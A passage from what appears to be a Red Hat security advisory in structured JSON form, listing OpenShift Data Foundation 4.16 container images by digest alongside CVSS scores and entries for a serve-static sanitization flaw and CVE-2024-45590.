"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "serve-static: Improper Sanitization in serve-static", }, { cve: "CVE-2024-45590", cwe: { id: "CWE-405", name: "Asymmetric Resource Consumption (Amplification)", }, discovery_date: "2024-09-10T16:20:29.292154+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", 